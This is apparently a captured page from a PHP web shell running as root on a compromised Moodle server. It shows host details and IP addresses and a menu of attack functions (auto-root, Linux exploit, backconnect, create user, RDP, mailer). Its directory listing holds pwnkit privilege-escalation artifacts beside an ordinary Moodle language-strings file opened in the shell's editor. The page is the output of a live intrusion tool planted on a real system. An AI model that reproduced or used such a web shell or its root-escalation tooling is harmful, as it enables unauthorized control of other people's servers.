Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
blocks /
myoverview /
lang /
en /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
block_myoverview.php
5.56
KB
-rwxrwxrwx
deprecated.txt
525
B
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : block_myoverview.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * Lang strings for the My overview block. * * @package block_myoverview * @copyright Mark Nelson <markn@moodle.com> * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ $string['allincludinghidden'] = 'All'; $string['all'] = 'All (except removed from view)'; $string['addtofavourites'] = 'Star this course'; $string['aria:addtofavourites'] = 'Star for'; $string['aria:allcoursesincludinghidden'] = 'Show all courses'; $string['aria:allcourses'] = 'Show all courses except courses removed from view'; $string['aria:card'] = 'Switch to card view'; $string['aria:controls'] = 'Course overview controls'; $string['aria:courseactions'] = 'Actions for current course'; $string['aria:coursesummary'] = 'Course summary text:'; $string['aria:courseprogress'] = 'Course progress:'; $string['aria:customfield'] = 'Show {$a} courses'; $string['aria:displaydropdown'] = 'Display drop-down menu'; $string['aria:favourites'] = 'Show starred courses'; $string['aria:future'] = 'Show future courses'; $string['aria:groupingdropdown'] = 'Grouping drop-down menu'; $string['aria:inprogress'] = 'Show courses in progress'; $string['aria:lastaccessed'] = 'Sort courses by last accessed date'; $string['aria:list'] = 'Switch to list view'; $string['aria:title'] = 'Sort courses by course name'; $string['aria:past'] = 'Show past courses'; $string['aria:removefromfavourites'] = 'Remove star for'; $string['aria:shortname'] = 'Sort courses by course short name'; $string['aria:summary'] = 'Switch to summary view'; $string['aria:sortingdropdown'] = 'Sorting drop-down menu'; $string['availablegroupings'] = 'Available filters'; $string['availablegroupings_desc'] = 'Course filters which are available for selection by users. If none are selected, all courses will be displayed.'; $string['card'] = 'Card'; $string['cards'] = 'Cards'; $string['courseprogress'] = 'Course progress:'; $string['completepercent'] = '{$a}% complete'; $string['customfield'] = 'Custom field'; $string['customfiltergrouping'] = 'Field to use'; $string['customfiltergrouping_nofields'] = 'This option requires a course custom field to be set up and visible to everyone.'; $string['displaycategories'] = 'Display categories'; $string['displaycategories_help'] = 'Display the course category on dashboard course items including cards, list items and summary items.'; $string['favourites'] = 'Starred'; $string['future'] = 'Future'; $string['inprogress'] = 'In progress'; $string['lastaccessed'] = 'Last accessed'; $string['layouts'] = 'Available layouts'; $string['layouts_help'] = 'Course overview layouts which are available for selection by users. If none are selected, the card layout will be used.'; $string['list'] = 'List'; $string['myoverview:myaddinstance'] = 'Add a new course overview block to Dashboard'; $string['nocustomvalue'] = 'No {$a}'; $string['past'] = 'Past'; $string['pluginname'] = 'Course overview'; $string['privacy:metadata:overviewsortpreference'] = 'The Course overview block sort preference.'; $string['privacy:metadata:overviewviewpreference'] = 'The Course overview block view preference.'; $string['privacy:metadata:overviewgroupingpreference'] = 'The Course overview block grouping preference.'; $string['privacy:metadata:overviewpagingpreference'] = 'The Course overview block paging preference.'; $string['removefromfavourites'] = 'Unstar this course'; $string['shortname'] = 'Short name'; $string['summary'] = 'Summary'; $string['title'] = 'Course name'; $string['aria:hidecourse'] = 'Remove {$a} from view'; $string['aria:showcourse'] = 'Restore {$a} to view'; $string['aria:hiddencourses'] = 'Show courses removed from view'; $string['hidden'] = 'Courses removed from view'; $string['hidecourse'] = 'Remove from view'; $string['hiddencourses'] = 'Removed from view'; $string['show'] = 'Restore to view'; $string['privacy:request:preference:set'] = 'The value of the setting \'{$a->name}\' was \'{$a->value}\''; // Deprecated since Moodle 3.6. $string['defaulttab'] = 'Default tab'; $string['defaulttab_desc'] = 'The tab that will be displayed when a user first views their course overview. When returning to their course overview, the user\'s active tab is remembered.'; $string['morecourses'] = 'More courses'; $string['nocoursesinprogress'] = 'No in progress courses'; $string['nocoursesfuture'] = 'No future courses'; $string['nocoursespast'] = 'No past courses'; $string['noevents'] = 'No upcoming activities due'; $string['next30days'] = 'Next 30 days'; $string['next7days'] = 'Next 7 days'; $string['recentlyoverdue'] = 'Recently overdue'; $string['sortbycourses'] = 'Sort by courses'; $string['sortbydates'] = 'Sort by dates'; $string['timeline'] = 'Timeline'; $string['viewcoursename'] = 'View course {$a}'; $string['privacy:metadata:overviewlasttab'] = 'This stores the last tab selected by the user on the overview block.'; $string['viewcourse'] = 'View course'; // Deprecated since Moodle 3.7. $string['complete'] = 'complete'; $string['nocourses'] = 'No courses';
Close